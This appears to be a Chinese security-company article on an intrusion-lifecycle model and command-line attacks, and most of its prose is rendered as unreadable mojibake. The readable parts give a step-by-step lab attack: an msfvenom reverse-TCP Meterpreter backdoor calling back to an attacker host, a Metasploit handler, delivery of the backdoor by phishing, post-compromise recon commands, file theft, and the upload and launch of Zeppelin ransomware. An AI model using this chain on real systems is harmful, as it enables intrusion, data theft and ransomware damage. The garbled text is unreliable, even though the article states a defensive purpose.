»Æ½ð³Ç¿Æ¼¼ÎªÁ˸üºÃµØ½øÐÐÈëÇÖ¼ì²âºÍ·ÀÓù£¬²ÎÕÕ¸÷Öֻƽð³Ç¹ÙÍøÍþв¿ò¼ÜºÍ×ÔÉíµÄʵ¼ùÓë˼¿¼£¬Ìá³öÁË»ùÓÚÈëÇÖÉúÃüÖÜÆÚµÄ¹¥»÷¹ÜÀíÄ£ÐÍ£¬×÷Ϊ»Æ½ð³ÇÐÂÒ»´ú»Æ½ð³Ç¹ÙÍø¼Ü¹¹µÄÈý´óÖ§ÖùÖ®Ò»¡£
ÈëÇÖÉúÃüÖÜÆÚv1.0°ÑÈëÇÖ¹ý³Ì»®·ÖΪ7¸ö½×¶Î£ºÌ½Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª¡¢´«²¥¡¢³Ö¾Ã»¯¡¢¹¥»÷ºÍÀûÓᢻָ´¡£ÈëÇÖÉúÃüÖÜÆÚv1.0ͬÑùÒÔATT&CK×÷Ϊ»ù±¾Õ½Êõ֪ʶ¿â£¬Æ¥Åäµ½²»Í¬µÄÈëÇֽ׶Ρ£ÐèҪעÒâµÄÊÇ£¬²¢·ÇËùÓеÄÈëÇÖ¶¼»á¾ÀúÕâ7¸ö½×¶Î£¬Ò²Ã»Óоø¶ÔµÄÏßÐÔ´ÎÐò¡£
1£©Ì½Ë÷·¢ÏÖ
ÔÚÕâ¸ö½×¶ÎÖУ¬¹¥»÷Õß»áÏÈËø¶¨¹¥»÷¶ÔÏó£¬È»ºóÀûÓÃijЩ¼¼ÊõÊֶΣ¬¾¡¿ÉÄÜ¶àµØ»ñȡĿ±ê±©Â¶³öÀ´µÄÐÅÏ¢£¬Èçͨ¹ý¶Ë¿ÚɨÃè¡¢Ö¸ÎÆÌ½²âµÈ·½Ê½£¬·¢ÏÖÃô¸Ð¶Ë¿Ú¼°°æ±¾ÐÅÏ¢£¬½ø¶øÑ°ÕÒ¹¥»÷µã£¬ÎªÏÂÒ»²½ÈëÇÖ×ö×¼±¸¡£
2£©ÈëÇֺ͸ÐȾ
ÔÚÕâ¸ö½×¶Î£¬¹¥»÷Õß»á¸ù¾Ý¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎËù·¢ÏÖµÄÖØÒªÐÅÏ¢£¬À´¶ÔÄ¿±ê±©Â¶³öµÄ¹¥»÷Ãæ½øÐй¥»÷³¢ÊÔ£¬ÔÚ¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎÊÕ¼¯µ½µÄÐÅÏ¢Ô½¶à£¬¹¥»÷¶ÔÏóËù±©Â¶µÄ¹¥»÷ÃæÒ²¾ÍÔ½¶à£¬¹¥»÷¸üÒ׳ɹ¦¡£
3£©Ì½Ë÷¸ÐÖª
¹¥»÷ÕßÔڳɹ¦½øÈëϵͳÄÚ²¿ºó£¬ÓÉÓÚÊÇÊ״νøÈëËùÒÔ»á³öÏÖ¶ÔÄÚ²¿»·¾³²»ÊìϤµÄÇé¿ö£¬Õâʱ¹¥»÷Õߵ͝×÷Ò»°ã»áÊǶԵ±Ç°Ëù´¦»·¾³½øÐÐ̽Ë÷£¬ÃþÇåÄÚ²¿´óÖµÄÍøÂç½á¹¹£¬³£³£°éËæ×ű»ÈëÇÖ±¾»úµÄÃô¸ÐÐÅÏ¢ÊÕ¼¯ÒÔ¼°¶ÔÄÚÍø´óÁ¿µÄ¶Ë¿Ú½øÐÐɨÃ裬ºóÐø¸ù¾Ý¹¥»÷ÕßµÄÄ¿µÄ½øÐÐÏÂÒ»²½²Ù×÷¡£
4£©´«²¥
Ôڴ˽׶Σ¬¹¥»÷Õ߸ù¾ÝÉÏÒ»½×¶ÎÔÚÄÚÍøÌ½Ë÷¸ÐÖªÊÕ¼¯µ½µÄÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨µÄ¹¥»÷ÊÖ·¨¡£ÈçÈô·¢ÏÖÄÚ²¿ÊÇÓò»·¾³£¬¹¥»÷Õß¿ÉÄ᳢ܻÊÔÏȹ¥ÆÆÓò¿Ø·þÎñÆ÷£¬ÔÙ´«²¥ÆäËû»úÆ÷¡£ÈôÊǹ¤×÷×é»·¾³£¬¿ÉÄÜ»áÀûÓÃÊÕ¼¯µ½µÄ¶Ë¿ÚºÍ·þÎñÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨Â©¶´½øÐÐÅúÁ¿É¨Ãè¹¥»÷£¬À´¾¡¿ÉÄÜ¶àµØ¼ÌÐø»ñµÃÆäËû¼ÆËã»úµÄ¿ØÖÆÈ¨¡£
5£©³Ö¾Ã»¯
¹¥»÷ÕßÔÚ¶Ô×ʲú½øÐжñÒâ²Ù×÷ºó£¬ÎªÁËÄܹ»¼õÉÙÔÙ´ÎÁ¬½ÓµÄ¹¥»÷³É±¾£¬·½±ãÏ´νøÈ룬»á½øÐС°ÁôºóÃÅ¡±µÄ²Ù×÷£¬³£¼ûµÄºóÃÅÈ磺½¨Á¢¼Æ»®ÈÎÎñ£¬¶¨Ê±Á¬½ÓÔ¶³Ì·þÎñÆ÷£»ÉèÖÿª»úÆô¶¯³ÌÐò£¬ÔÚÿ´Î¿ª»úʱ´¥·¢Ö´ÐÐÌØ¶¨¶ñÒâ³ÌÐò£»Ð½¨ÏµÍ³¹ÜÀíÔ±Õ˺ŵȡ£ÕâÑù±ãÓÚ¹¥»÷ÕßÏ´οìËٵǼ²¢¿ØÖƸÃϵͳ¡£
6£©¹¥»÷ºÍÀûÓÃ
¹¥»÷ÕßÔڴ˽׶αã»á¿ªÊ¼¶ÔÄ¿±ê×ʲú½øÐжñÒâ²Ù×÷£¬°´ÕÕ¹¥»÷ÕßÒâÔ¸£¬¶ÔÄÜÀûÓõÄÊý¾Ý½øÐÐÇÔÈ¡¡¢ÀûÓã»¶Ô²Ù×÷ϵͳ¡¢Ãô¸ÐÎļþ½øÐÐÆÆ»µ¡¢É¾³ý¡£ËùÓеķÀÓùÊֶζ¼Ó¦¸Ã¼«Á¦×èÖ¹¹¥»÷Õß½øÐе½ÕâÒ»½×¶Î¡£
7£©»Ö¸´
¹¥»÷ÕßÔÚÖ´ÐÐËùÓеĹ¥»÷²Ù×÷ʱ£¬ÍùÍù»áÔÚϵͳÉÏÁôÏ´óÁ¿µÄÐÐΪÈÕÖ¾£¬Òò´ËÔÚÕâÒ»½×¶Î£¬¹¥»÷Õß»á¶Ô¼Ç¼×ÔÉíºÛ¼£µÄËùÓÐÈÕÖ¾½øÐд¦Àí£¬»òɾ³ý»ò»ìÏý£¬´Ó¶øÏûÃðÖ¤¾Ý£¬ÌÓ±Ü×·×Ù¡£
±¾ÏµÁÐÎÄÕ»ùÓڻƽð³Ç¿Æ¼¼ÈëÇÖÉúÃüÖÜÆÚ1.0¼Ü¹¹£¬Ï¸·Ö¸÷½×¶Î¹¥»÷Õߵij£Óù¥»÷ÊֶΣ¬²¢¶ÔÏà¹Ø¹¥»÷ÊֶεľßÌåʵʩ·½Ê½½øÐÐÖðÒ»ÆÊÎö£¬Îª»Æ½ð³Ç¹ÙÍø·ÀÓù½¨ÉèÌṩÓÐÁ¦ÖªÊ¶²¹³äºÍ·´ÖÆ×¼±¸¡£
ÃüÁîÖ´Ðй¥»÷£¨¹¥»÷ºÍÀûÓã©
Command-Line Interface£¬¼´ÃüÁîÐнçÃæ¡£ÃüÁîÐнçÃæÌṩÁËÒ»ÖÖÓë¼ÆËã»úϵͳ½øÐн»»¥µÄ·½Ê½£¬²¢ÇÒÊÇ¿ç¶àÖÖÀàÐ͵IJÙ×÷ϵͳµÄ¹²Óй¦ÄÜ¡£Windows ϵͳÉϵÄÒ»¸öʾÀýÃüÁîÐнçÃæÊÇ cmd£¬¿ÉÓÃÓÚÖ´ÐÐÐí¶àÈÎÎñ£¬°üÀ¨Ö´ÐÐÆäËûÈí¼þ¡£
ÃüÁîÐнçÃæÊDzÙ×÷ϵͳÖÐ×îÖØÒªµÄÓ¦ÓóÌÐòÖ®Ò»£¬Ã¿¸ö²Ù×÷ϵͳ¶¼»áʹÓõ½ËüÈ¥Ö´ÐÐϵͳÃüÁî¡¢½Å±¾¡¢¹¤¾ß£¬¹¥»÷Õß¿ÉÀûÓÃÃüÁîÖ´ÐЩ¶´»òwebshellͨ¹ýÍⲿӦÓóÌÐòµ÷Ó÷þÎñÆ÷µÄÃüÁîÐнçÃæÖ´ÐÐÃüÁî¡£
¸ù¾Ý¹¥»÷ÕßµÄÈëÇÖÁ÷³ÌºÍ²Ù×÷ÊֶΣ¬Í¨¹ýÃüÁîÐнçÃæ¿ÉÖ´Ðд´½¨Óû§¡¢·´µ¯shell£¬cs/msfÉÏÏß¡¢ÉÏ´«¶ñÒâÎļþ¡¢É¨ÃèÄÚÍøÐÅÏ¢µÈ¶ñÒâ²Ù×÷¡£
´ÓÈëÇÖÉúÃüÖÜÆÚ½Ç¶È·ÖÎö£¬ÃüÁîÐнçÃæ¿É±»¹¥»÷ÕßÓÃÓÚ̽Ë÷¸ÐÖªÒÔ¼°¹¥»÷ºÍÀûÓÃÁ½¸ö½×¶Î¡£
´Ó¹¥»÷ÐÐΪÁ´ÌõµÄÉÏÏÂÎÄÀ´¿´£¬Õë¶ÔÃüÁîÐнçÃæµÄÐÐΪÁ´ÌõÊäÈëÊä³öÈçÏÂ
ÊäÈ룺Ŀ±ê·þÎñÆ÷Òѱ»¹¥»÷Õß¿ØÖÆ
Êä³ö£º¹¥»÷ÕßÔÚ²Ù×÷¹ý³ÌÖÐʹÓÃÃüÁîÐнçÃæÓëϵͳ½»»¥²¢Ö´ÐжñÒâÃüÁî»ò¶ñÒâÈí¼þ
ÃüÁîÐнçÃæµÄ³£ÓÃÊÖ¶ÎÈçÏÂ
1¡¢MetasploitÉú³ÉwindowsºóÃŲ¢¿ØÖƾÖÓòÍøÖ÷»ú£¬Ö´ÐжñÒâ²Ù×÷
²Ù×÷»·¾³£º±¾»ú kali ,ip:192.168.215.151
±»¹¥»÷Õß window7,ip:192.168.215.148
ÍøÂç»·¾³£º¾ÖÓòÍø
£¨1£©Ê×ÏÈÖ´ÐÐ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.151 LPORT=6666 -f exe > 6666.exe Éú³ÉÒ»¸ö windows »·¾³ÏµĺóÃÅ exe Îļþ£¬LHOST ÊÇÖ´ÐкóÃźóËùÒª·´µ¯µÄ ip,LPORT ÊǶ˿ڡ£

£¨2£©Æô¶¯ msfconsole

£¨3£©Æô¶¯ msf ºó²½ÖèÈçÏ£º
¢ÙʹÓà use exploit/multi/handler Ä£¿é
¢ÚÉèÖà payload£¬set payload windows/meterpreter/reverse_tcp£¬Õâ´ÎÊÇÒ»¸ö·´µ¯ shell µÄpayload
¢ÛÉèÖà LHOST Ϊ±¾»úµÄ ip192.168.215.151
¢ÜÉèÖà LPORT Ϊ 6666£¬ÓëÎÒÃÇÇ°ÃæÉú³Éʱ windows ºóÃÅʱµÄ¶Ë¿ÚÒ»Ñù
¢Ý×îºó exploit Ö´ÐÐ

£¨4£©ÉèÖÃÍê³Éºó£¬°ÑÇ°ÃæÉú³ÉµÄºóÃÅÎļþ 6666.exe ͨ¹ýµöÓãÓʼþ»òÉ罻ýÌåÇþµÀ·¢Ë͸øÊܺ¦Õߣ¬ÈçÏÂͼ¿ÉÒÔ¿´µ½ windows ÒѾִÐÐÁ˺óÃÅÎļþ

£¨5£©ÊäÈë shell£¬¼´¿ÉÇл»µ½ cmd ÃüÁîÐнçÃæ

£¨6£©Ê¹Óà cmd£¬¿É½øÐÐÐÅÏ¢ÊÕ¼¯
ÒÔÏÂΪ³£ÓÃÀ´ÉøÍ¸µÄ windows ÃüÁî
¢ÙÊÕ¼¯ÊܸÐȾ»úÆ÷µÄÐÅÏ¢
tasklist -- ÏÔʾÔËÐеÄËùÓнø³Ì
ver -- ÏÔʾϵͳ°æ±¾ºÅ
ipconfig -- ÏÔʾµ±Ç° TCP/IP ÍøÂçÅäÖÃ
systeminfo -- ÏÔʾ¹ØÓÚ¼ÆËã»ú¼°Æä²Ù×÷ϵͳµÄÏêϸÅäÖÃÐÅÏ¢
net time -- ²é¿´ÏµÍ³Ê±¼ä
netstat -- ÏÔÊ¾ÍøÂçÁ¬½Ó¡¢Â·ÓɱíºÍÍøÂç½Ó¿ÚÐÅÏ¢
whoami -- ²é¿´µ±Ç°ÓÐЧÓû§Ãû
net start -- Æô¶¯·þÎñ
¢Ú²éÕÒ±£´æÔÚ»úÆ÷ºÍÍøÂçÖеÄÔ¶³Ì¼ÆËã»úÉϵÄÐÅÏ¢
dir -- ÏÔʾ´ÅÅÌĿ¼ÄÚÈÝ
net view -- ÏÔʾ¹²Ïí×ÊÔ´Áбí
ping -- ¼ì²éÍøÂçÊÇ·ñÁ¬Í¨
net use -- ²é¿´Á¬½ÓµÄ¼ÆËã»ú
type -- ÏÔʾÎı¾ÎļþµÄÄÚÈÝl
net user -- ÏÔʾÓû§ÕË»§ÐÅÏ¢
net localgroup -- Ð޸ļÆËã»úÉϵı¾µØ×é
net group -- Ìí¼Ó¡¢ÏÔʾ»òÐ޸ķþÎñÆ÷ÉϵÄÈ«¾Ö×é
net config -- ÏÔʾÕýÔÚÔËÐеĿÉÅäÖ÷þÎñ l
net share -- ´´½¨¡¢É¾³ý»òÏÔʾ¹²Ïí×ÊÔ´
¢ÛÓÃÆäËû¶ñÒâÈí¼þ¸ÐȾ»úÆ÷»ò³¢ÊÔ·ÃÎÊÆäËû»úÆ÷
reg -- ×¢²á±í²Ù×÷
wmic -- ÌṩÁË´ÓÃüÁîÐнӿںÍÅúÃüÁî½Å±¾Ö´ÐÐϵͳ¹ÜÀíµÄÖ§³Ö
netsh advfirewall -- ¹ÜÀí·À»ðǽ
sc -- ÓÃÀ´ºÍ NT ·þÎñ¿ØÖÆÆ÷ºÍ·þÎñ½øÐÐͨѶµÄÃüÁîÐгÌÐò
£¨7£©Ê¹Óà download C:\\Users\\dell\\Downloads\\work\\111.txt /rootÃüÁ¿É½« windowsϵÄÎļþÏÂÔØµ½ kali


£¨8£©¡¢Ê¹Óà upload /root/zeppelin.exe C:\\Users\\dell\\Desktopmingl ,½« zeppelin ÀÕË÷²¡¶¾ÉÏ´«µ½windowsÉÏ

£¨9£©ÈçÏÂͼ£¬¿É¿´µ½ zeppelin ÀÕË÷²¡¶¾µÄ exe ÎļþÒÑÉÏ´«µ½ windows µÄ×ÀÃæÉÏ¡£

£¨10£©¡¢Ö´ÐÐ start Zeppelin.exe £¬Ö´ÐÐÀÕË÷²¡¶¾£¬¸Ã windows Êܵ½ÀÕË÷²¡¶¾¹¥»÷£¬Îļþ±»¼ÓÃÜ¡£
